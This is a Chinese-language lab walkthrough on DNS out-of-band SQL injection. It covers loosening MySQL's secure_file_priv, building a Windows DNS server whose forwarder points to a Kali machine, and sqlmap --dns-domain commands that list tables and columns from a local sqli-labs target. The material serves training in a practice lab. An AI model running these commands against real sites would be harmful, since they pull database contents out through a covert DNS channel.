DNS外带注入

修改mysql的secure_file_priv属性

在我们进入MySQL进行查找的时候，他的值是为null，

所以需要对他进行修改，在配置文件my.ini中进行配置文件的修改。

然后以txt的形式将他打开，然后添加一句secure_file_priv=""的记录在mysqldb模块中。


修改好后重新启动mysql，然后再次查看，可以看到它的值变成这样就可以了。

配置dns服务器

1.添加角色：右键角色，选择添加角色

然后根据弹出来的页面选择下一步

然后勾选DNS服务器，（因为我安装了一个，所以这个我选的别的进行的演示。），然后点击下一步。

弹窗出来后选择仍要安装DHCP服务器，然后下一步。

后面的弹窗也是一直下一步，直到安装可以按了之后，点击安装就可以了。

2.添加正向查找

选中WIN-GNN1,然后选择正向查找区域，右键，选择新建区域。

然后跳出弹唱就直接选择下一步，就可以，然后默认它的选项选择主要区域，然后点击下一步。

然后建立一个区域名称，这里就随便写就可以了。

默认选项，选择下一步

默认选项，选择下一步

点击完成就可以了。

这样正向查找区域就创建成功了。

3.正向查找建立完毕之后，要对一些配置进行修改。

右键WIN哪个，然后点击属性。

选择高级，在高级中的服务器选项中有一个禁用递归，如果是勾上的一定要取消，因为服务器就是需要递归来进行转发的，如果勾上了也转发不了了。

在监视中，将简答查询和递归查询都是要勾上的，一定要使用到递归查询。

其余的就先不用管了。

4.新建主机

选择刚刚建好的区域名称，然后右键之后，选择新建主机。

填写主机名称和IP，名称就写的是ns，IP地址为你sqlmap所在虚机的ip地址。

在创建一个泛解析，ip地址依旧是和刚刚那个一样。

添加主机之后就创建完成了，然后把win11的虚拟机的dns服务修改为刚刚配置的服务器的ip地址。

然后使用win11的虚拟机取ping刚刚在服务端设置的域名，
并且在kali中输入tcpdump -n port 53；查看信息返回。

并且可以看到kali中是有返回信息的。

5.创建条件转发器

选择条件转发器，然后右键，新建一个条件转发器。

DNS域的域名可以随便写，但是就不要写和刚刚那个相同的就行。IP地址是匹配的kali的IP地址。

然后在win11上ping刚刚设置的转发IP就可以了，在kali中观察是否收到了日志。

SQLMap使用外带dns注入。

1.取到数据库

注入并查找到库民

sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D security --tables
1

获取到数据表

sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" --tables 
1

获取user表中的列

sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" -t "users" --columns

1
2